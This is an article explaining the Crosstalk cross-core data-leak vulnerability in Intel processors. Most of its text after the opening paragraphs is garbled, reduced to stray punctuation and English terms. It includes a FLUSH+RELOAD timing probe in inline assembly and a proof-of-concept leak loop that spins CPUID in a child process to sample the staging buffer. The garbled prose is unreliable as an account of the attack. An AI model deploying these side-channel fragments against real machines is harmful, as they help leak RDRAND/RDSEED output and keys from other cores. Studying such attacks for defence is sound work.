In recent years, a large number of reports have begun to appear about all kinds of vulnerabilities in Intel processors . The most famous of them are Specter and Meltdown , based on errors in the implementation of speculative command execution. In June 2020, a message appeared about a new vulnerability called Crosstalk .
Unlike the aforementioned vulnerabilities, Crosstalk is a data transfer vulnerability from one core to another. Thus, vulnerability protectors designed to overcome speculative execution leaks within the kernel cannot protect against Crosstalk. To understand the essence of this type of data leak, you need to know what speculative instruction execution is, how the processor pipeline works, and how data is transferred between cores. Let us briefly touch upon each of these topics.
Speculative computing
The speculative execution of instructions by the processor is one of the hardware methods for detecting parallelism at the instruction level. Calculations are carried out simultaneously for several paths of program execution. The simplest example is the speculative evaluation of two branches in a conditional branch.
Conveyor
, , . , . , , . 16 . , 8 .
?
x86 . , . Vrije Universiteit Amsterdam , . , - MDS (Model-Specific-Registers) RDMSR WRMSR. . userspace CPUID, RDRAND RDSEED.
, DRNG , bootguard . Crosstalk , , , RDRAND RDSEED.
RDRAND RDSEED
RDRAND , digital random number generator (DRNG), . DRNG , . RDSEED , .. RNG.
, RIDL, , : Line Fill Buffer, Load Ports, Store Buffer.
Line Fill Buffer (LFB) L1 Cache ( ) - L1 Cache. , , , LFB . . LFB.
Store Buffer .
Load Ports I/O . , Load Ports .
Crosstalk
Crosstalk . , . , , , LFB, , . . , . , , , .
FLUSH + RELOAD
inline int probe(char *adrs) {
volatile unsigned long time;
asm __volatile__ (
" mfence \n"
" lfence \n"
" rdtsc \n"
" lfence \n"
" movl %%eax, %%esi \n"
" movl (%1), %%eax \n"
" lfence \n"
" rdtsc \n"
" subl %%esi, %%eax \n"
" clflush 0(%1) \n"
: "=a" (time)
: "c" (adrs)
: "%esi", "%edx");
return time;
}RIDL LFB, . FLUSH + RELOAD, ( ) FLUSH, , . - . , LFB. ( load), pagefault. , , LFB. , FLUSH + RELOAD. , . , , , . - , LFB.
CPUID
pid_t pid = fork();
if (pid == 0) {
while (1)
asm volatile(
"mov %0, %%eax\n"
"cpuid\n"
::"r"(CPUID_LEAF):"eax","ebx","ecx","edx");
}
for(size_t offset = BEGIN_OFFSET; offset < BEGIN_OFFSET + 4; ++offset) {
// ...
for(size_t i(0); i < ITERS; ++i) {
flush(reloadbuffer);
tsx_leak_read_normal(leak + offset, reloadbuffer);
reload(reloadbuffer, results);
}
}, CPUID. . MDS. RIDL. . , . FLUSH + RELOAD , . , CPUID 4 , CROSSTALK. , CROSSTALK
. RDSEED. , RDSEED 0, . RDSEED . , , RDRAND RDSEED, - RDSEED. , . , . , , FLUSH + RELOAD.
, , , . , CPUID, . , RDRAND RDSEED , . , LFB. MDS , (hyperthread), , .
, . , , . , , . , , , RDRAND, RDSEED EGETKEY. , , , .